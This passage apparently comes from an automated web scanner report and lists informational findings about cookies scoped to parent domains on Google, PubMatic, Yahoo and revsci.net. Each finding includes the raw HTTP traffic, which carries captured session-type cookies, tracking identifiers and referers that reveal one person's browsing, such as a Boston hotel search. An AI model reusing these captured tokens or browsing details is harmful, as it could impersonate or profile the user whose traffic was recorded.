NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; expires=Thu, 04-Aug-2011 16:28:07 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAGw6wehKYIfPfAuhig8lJow.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=static+2mdn+net&channel=linkdoctor
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=3vQhgRVNB3h3QLsaTkCSkHIiOnaN2Jby-UMzZZUUQg=avCM2zCK3xcw-GGm; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; SSDATA-DOMAIN=ikjREw(0:; TZ=360; NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; S=sorry=6N0zPerLQtaqcOPwyzNvWg; GDSESS=ID=3835842a4a693afb:EX=1296674886:S=ADSvE-emQw1lIo2YoqCOpGtBmC8AL8VPeQ

Response

HTTP/1.1 200 OK
Set-Cookie: NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7; expires=Thu, 04-Aug-2011 16:28:07 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 02 Feb 2011 16:28:07 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.80. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=43=O3bWY1dMWMl7MEbfUZNbygK1mKYX7CqQUkvYfzXVee08aede1m6mupkjEqBMMythuX4BumcHNn0it8JvLzo5ISwa1V9hqHSgqFGckJ3rOTmrkyzvG00r7w6MU_tGHgfd; expires=Sun, 07-Aug-2011 14:21:21 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://updates.orbitz.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=3vQhgRVNB3h3QLsaTkCSkHIiOnaN2Jby-UMzZZUUQg=avCM2zCK3xcw-GGm; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=QvwfTsBLG0fY_tCzmQcl5S01_3iEzOWMtfTt7pnwqvW9z0YwdoapJxj1G3iMc9VVflP4ZgfthP6beVczqAQ07TzamFD1mLXnRq6Jo4UMiZbB1HugDq4PXprcSp8yxFS7

Response

HTTP/1.1 200 OK
Set-Cookie: NID=43=O3bWY1dMWMl7MEbfUZNbygK1mKYX7CqQUkvYfzXVee08aede1m6mupkjEqBMMythuX4BumcHNn0it8JvLzo5ISwa1V9hqHSgqFGckJ3rOTmrkyzvG00r7w6MU_tGHgfd; expires=Sun, 07-Aug-2011 14:21:21 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Sat, 05 Feb 2011 14:21:21 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.81. http://id.google.com/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAIUFIolnpKwmOAKbBVumOsA.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; expires=Thu, 04-Aug-2011 21:50:24 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; expires=Thu, 04-Aug-2011 21:50:24 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Wed, 02 Feb 2011 21:50:24 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.82. http://id.google.com/verify/EAAAAM7b2OjFQ5ateN5qC1yJ4pM.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAM7b2OjFQ5ateN5qC1yJ4pM.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; expires=Wed, 03-Aug-2011 15:25:02 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAM7b2OjFQ5ateN5qC1yJ4pM.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=dXxArotuJyDYQ1VQrpKm701uNT9DB3GX-tg4wIuY7Q=dcvOXnVctesqr6XP; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; SSDATA-DOMAIN=ikjREw(0:; TZ=360

Response

HTTP/1.1 200 OK
Set-Cookie: NID=43=jYcJVEekPY61UDlxS8ZFDMCDrVXT-0pc6E2zpbKIsUemwOUvjAWjWWIv9EIlSP4j_vcfJf8hjaSfk6EmkvSSNP9VthNmi7HlRzfZoWSH10k7PN3eueZhbJrWsVPxbVNb; expires=Wed, 03-Aug-2011 15:25:02 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 01 Feb 2011 15:25:02 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.83. http://id.google.com/verify/EAAAAMVVh-syzGBXI20HkVGrij0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAMVVh-syzGBXI20HkVGrij0.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=43=dXxArotuJyDYQ1VQrpKm701uNT9DB3GX-tg4wIuY7Q=dcvOXnVctesqr6XP; expires=Wed, 03-Aug-2011 15:24:14 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAMVVh-syzGBXI20HkVGrij0.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=vfjbZi4yW7r7c1JCp0YiJDoKwrqHg4Hplt3AHByalQ=ZoD319s-lagJ69TX; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; SSDATA-DOMAIN=ikjREw(0:; TZ=360

Response

HTTP/1.1 200 OK
Set-Cookie: SNID=43=dXxArotuJyDYQ1VQrpKm701uNT9DB3GX-tg4wIuY7Q=dcvOXnVctesqr6XP; expires=Wed, 03-Aug-2011 15:24:14 GMT; path=/verify; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 01 Feb 2011 15:24:14 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

11.84. http://id.google.com/verify/EAAAANQX8mNlPuHuy5T3Ad-9QzA.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAANQX8mNlPuHuy5T3Ad-9QzA.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

SNID=43=dXxArotuJyDYQ1VQrpKm701uNT9DB3GX-tg4wIuY7Q=dcvOXnVctesqr6XP; expires=Wed, 03-Aug-2011 15:24:14 GMT; path=/verify; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAANQX8mNlPuHuy5T3Ad-9QzA.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=43=vfjbZi4yW7r7c1JCp0YiJDoKwrqHg4Hplt3AHByalQ=ZoD319s-lagJ69TX; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=pmnSJWiZwGth09kNohAMwJvIpkIdJSJlqyMqx-omPXiSQSzkkNSHqGwv9A9J-zJ5JWsywblLTMJRa23z5AiuJrUbUWrTlS9i8IOD2l1hjJpMR5EY4CTSxmfm-gxCfk12; SSDATA-DOMAIN=ikjREw(0:; TZ=360

Response

11.85. http://image2.pubmatic.com/AdServer/Pug previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/AdServer/Pug

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

KRTBCOOKIE_148=1699-uid:$UID; domain=pubmatic.com; expires=Fri, 01-Feb-2013 15:32:10 GMT; path=/
PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTgwNiZ0bD01MTg0MDA=&piggybackCookie=uid:$UID HTTP/1.1
Host: image2.pubmatic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: KRTBCOOKIE_58=1344-CA-00000000456885722; KRTBCOOKIE_57=476-uid:4760492999213801733; KRTBCOOKIE_133=1873-6ch47d7o8wtv; KRTBCOOKIE_80=1336-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.&KRTB&1685-82d726c3-44ee-407c-85c4-39a0b0fc11ef.30767.16681.; KRTBCOOKIE_148=1699-uid:D8DB51BF08484217F5D14AB47F4002AD; KRTBCOOKIE_22=488-pcv:1|uid:3011330574290390485; KRTBCOOKIE_16=226-uid:3271971346728586924; pubfreq_26263=207-2; PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; KTPCACOOKIE=YES; PMDTSHR=; KADUSERCOOKIE=4AC32DB0-0B6A-48EE-BE74-FD6E7D9BC764; KRTBCOOKIE_153=1923-41yKvrFZ3L_6C466tA2Vu-Rdi-v6AY_r4FlErZjJ; pubtime_26263=TMC;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:32:10 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_148=1699-uid:$UID; domain=pubmatic.com; expires=Fri, 01-Feb-2013 15:32:10 GMT; path=/
Set-Cookie: PUBRETARGET=82_1389464380.78_1389464380.1113_1297450679.806_1325962677.1039_1297450683.445_1302634725.825_1297450726.1834_1297470581.1444_1298250150; domain=pubmatic.com; expires=Sat, 11-Jan-2014 18:19:40 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

11.86. http://images.google.com/images previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.google.com
Path:	/images

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

PREF=ID=8d7907b0c7f09bac:FF=0:TM=1296574493:LM=1296574493:S=lfLFI68r6wBg7FaU; expires=Thu, 31-Jan-2013 15:34:53 GMT; path=/; domain=.google.com
NID=43=SAEMpYC90DErhb66yRsYvQG01dZ5eRjLoa7wcP6kAfkAmC3pWlFKj4H6wam27bDY4dIvlllkpQO2a6ANLUHqk6pWPCHetmbneDJ1Ec5l2lgnbYwwsbh772L3bqu7MrZf; expires=Wed, 03-Aug-2011 15:34:53 GMT; path=/; domain=.google.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Location: http://images.google.com/imghp
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=8d7907b0c7f09bac:FF=0:TM=1296574493:LM=1296574493:S=lfLFI68r6wBg7FaU; expires=Thu, 31-Jan-2013 15:34:53 GMT; path=/; domain=.google.com
Set-Cookie: NID=43=SAEMpYC90DErhb66yRsYvQG01dZ5eRjLoa7wcP6kAfkAmC3pWlFKj4H6wam27bDY4dIvlllkpQO2a6ANLUHqk6pWPCHetmbneDJ1Ec5l2lgnbYwwsbh772L3bqu7MrZf; expires=Wed, 03-Aug-2011 15:34:53 GMT; path=/; domain=.google.com; HttpOnly
Date: Tue, 01 Feb 2011 15:34:53 GMT
Server: gws
Content-Length: 227
X-XSS-Protection: 1; mode=block
Connection: close

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://images.google.com/imghp">
...[SNIP]...

11.87. http://info.yahoo.com/w3c/p3p.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://info.yahoo.com
Path:	/w3c/p3p.xml

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

B=5tvhlp96kga0t&b=3&s=7g; expires=Tue, 01-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w3c/p3p.xml HTTP/1.1
Host: info.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 15:34:53 GMT
Set-Cookie: B=5tvhlp96kga0t&b=3&s=7g; expires=Tue, 01-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Fri, 26 Sep 2008 21:45:52 GMT
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: application/xml
Cache-Control: private

<?xml version="1.0" encoding="UTF-8"?>
<META xmlns="http://www.w3.org/2001/09/P3Pv1">
<POLICY-REFERENCES>
<POLICY-REF about="http://info.yahoo.com/privacy/w3c/p3p_policy.xml">
<INCL
...[SNIP]...

11.88. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLvv9SEJaSpn5l6pKNOgJzc7zXFBImlqLQZYGOfvoT8h7Ts3xm/ap8Mkb9Q+GVTuR5n80ave3qy14HbyO8+Tcni3oWJVsXNJZ2BoNcclQkVAkXBr3QjDZUGqY/VB76lycBkbXZ/PmM5ZvqG73GQvL4NN3zYvKIXx9zvKHgRcUGOKdYPdUASY9ojdIV8gYJGQFNpzGY2z0gWMDX4TxCEac8R3Ke9ppb194xfECkX2pU1O1iHFy42uElW4j5+v/f8eKkFQ5MzvYE/jyv/rdQiQ09Ai+GU/SjsOZnNQhSBqoMRy93up9vn3PUZA45DM7V+v2Zgn8PXHeSPS85ij7VFR9oQiUVQO38lZzBhUE4hFvl3EkuGg0bi17IV4EBRVWiGu2RmG1QDm5JKJTNslOkv1LdL89z3GMvpJmvs+T5vdyHmAWeZtfRM9cFdfQGSZJjmNUVtgqHDCEiPN0vrW3gnfNbz8nrxNp/cOhwEmsOuhPOMUp+bhkRfmz9kYr5Jnari/GTw58CYqV8h4rzD7qgsc6K4ko5+gPLeQCL5fF69RvQ7fHNZCY0Wgm6mdclFvksFmiNCBpS9srXF7bYyO3+oeVB4D8j5B9nxiUjybPaivGWNDOgiQD79UoUb73FJ7Wm2q4yQrEhX1SpimuhPzRYA0qz7LRvSc3Zoyp+uKsqctxrNIF98i4/5zjBOYg6j/oTeItuQpdMgnyCRARTjQVRzDG96I9Zo6QAEqZ+Y0Iv7BJZL6jkVTjliHFn3FYRW3KH63Oo2bPpUYPX3DgLj6a3b3noH5DkkVQsOSyax16pb5DFwSyDDHu/ugupu5TH8NhEFXauRtWMQprWMn/RWgZFUzttuV9+nL1UnJeHsmWcaceq2g5cjxG1QCGzBbIio/mVhYuhpLzriZs7gmMWx57OH6EAkOz81CWKdorEUgfK0LHu/h+pCNMEHMQhgIlyLysXM8hjqWOr2q1JiFiQmE8C5vXaiir/3o/JYyvxUU0zqT2uM0qnKPCWoCbsd3re35olXtVu8xecblsDX5g66gqZsTE6PDW8nGDZGkIdAGFJ7PZeycd5UmrQSEfWKf4cgvbrqXv0XExi2hrQTYXR0Ql4YjukjJ8J5wlmXH0J4hY3uL+VfDSeK4BvrrNJu19JkjkefmVpbC4yYpcu0I0IY4u43Hkcwa1LL+N8+mYbQTmfoGF5IQ+frCKYD5ncwZ04oRqB8G8Y3clOManGAsTIJJC1Hgb3tiZMPDnWHX1HKz; Domain=.revsci.net; Expires=Thu, 02-Feb-2012 15:11:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=F08747 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.ehow.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=TSeEzxMBEwoAABzXtKIAAAAt; NETSEGS_K05540=0105974ea67d21e1&K05540&0&4d55a964&0&&4d2fe81e&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_J08778=0105974ea67d21e1&J08778&0&4d5ae6ff&0&&4d350f93&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_K04491=0105974ea67d21e1&K04491&0&4d62d3e4&0&&4d3cf159&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_H05525=0105974ea67d21e1&H05525&0&4d631d1f&0&&4d3d3a07&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_G07610=0105974ea67d21e1&G07610&0&4d631e10&0&&4d3d330b&4c5cffb70704da9ab1f721e8ae18383d; NETSEGS_B08725=0105974ea67d21e1&B08725&0&4d656938&0&&4d3f9d13&4c5cffb70704da9ab1f721e8ae18383d; rsi_us_1000000=pUMdIz9HMAYU1E2E9n2ISiO7LH9AdCZB8/1a2KTS3G5aZx/NZi+P8cW2My/DwFExss6o41Rb1frll4heX/wIlF9+5hutyLzGGJeqWQ+EtLTv6NPkfin9gOJr1fis6gF32mRyjYPB+ZWxeJb5RBOlBE9ZcPm0s9GPlU+kU3cJNpFiJhrTEEyRwyqsBVplUzoVSbJzTvXGpU9ndRFrT42Z2rhCsTZ545aurI27EmHe3foKpOjQUfG7FP2sNsmL+vKE5LSewa8YlG2A78XL0sy4wFL2WuXW4j/XgUAsZAAonTG4h4hLSnwuTgXjiQ3XBglP6wa82rCzMFCioNtC1wGYnNHJIs1WzZyVbuNSl73Xje6dpjaJ9d4yT92rVBJjViaEnqpCfi44qaHMM2Ip1FswSfCzkAryte7FZO5U2Gi1DiNtRj19L5DNXH9t2rVQa/SPDZjwvfG0+tfOoqOtbT6ehHegFo62Z1+7d0hcUsUiLyzZ70sOogCTx2W1NAR0rfIwVzb2cLrFrGQwny8+T957xMpFQsmf12hkmcv4vjxgee/nx3K8q5XuvI2gm2GtT4q9FOutkDvDxbGOb97wmamFimMU41hfEDMGi3Lk+6TsHF/iRUMm5BDMhDtVcdsuCfM5ORhQyoZ726Z0+7YvTqoDqkDV5gEbmIyzQrW6TwZlzb00UdtjPl0+snH0If9z10LpIaeG+9b2bsOpyOBNhc5AAWBVLwcP71OoYBjKPlnOAt5Y21ydGkg9Ez+ZtKF9Zpx1NFJV8MNLq1fJ2zg4CmhIddlR6FKQuQTb6RiE4tr2EdcFzD9ZZFi7HeK45WqywA2b8ANKBW1pBZpbaR1litt4B5OoA/shRe7BS364p/6UTjV0Cv6Bv9j/LKmWG42JJrO39plBORNaspZNL0SmbfNCgpycmTxHQ2sA0yhkzT/vH6Vz8gNy4wwD7D2CUGOXMweyApFWXPYMtH74zy4AOcVL/6eXvGKSE6wn4YOTy+5z77OqnOVR57KDxoL5JYiPBHyQPu3jqvk+Y//pbzu0SLAf1kBgS7w0mVpfe2Tu9KeCmh4D7T/Bg+eSemdp5s/lJtLZjkzKlP1V1FI8dJ83UV0sRxhmd86EHax0CT+OVVonD+RasYP7/Fhmt7+azm4WQCcubjdd2RKgHIfX347bSApoJ+ydExP3QuS1/wv/BereoJGU2W5hq3ssqKRgiJ0pEZ9RM7U8Wxj20WQc0I7faLudXZXKkMIn3zZArcWZYLFinHAsa3eMtlIkw1Oqh4fwtpbP; NETSEGS_A06546=0105974ea67d21e1&A06546&0&4d69a909&0&&4d439426&4c5cffb70704da9ab1f721e8ae18383d; rtc_0=MLsvsSNONj5rJ5GcjT68k50qPXPDyERqefZOna8MpC1/MWJCA4xH8SpWANL7YB35qSS2yy33RhKjqBIMAOt8NoSzFqWLk9C/EJW8fOfXalWBSLot+iDRScbnkWzcs1/5J9Rx2c+G+oM0+jiIjwnzOTsWVXIT3GJP2zqS8f5YK8LGidZZncaP6FyDewZOD9OqSXj0NADF7466hKYsChUFHUNSff/3W9Ex/u0KFSUhMg3pTqYAo5WxWU01Utx+qoxPJcgytEBIWsioEX18AfchTIZJmLQAEZ/GX1LD0ubdgUVJbjy56rZyaUyBYLpIwqtbgx/90WrLhotV4hGILddtKL521RDHO3KguvCmAbp7tNQv1TNIkXJQw69MkhHauf14LG4Jl+6S91aCeKmyWq/ifshFreMNqI1pwfaCUIgSDqQR71PQ5uSSjfqXxM5HAKaUJwTu5OY=; 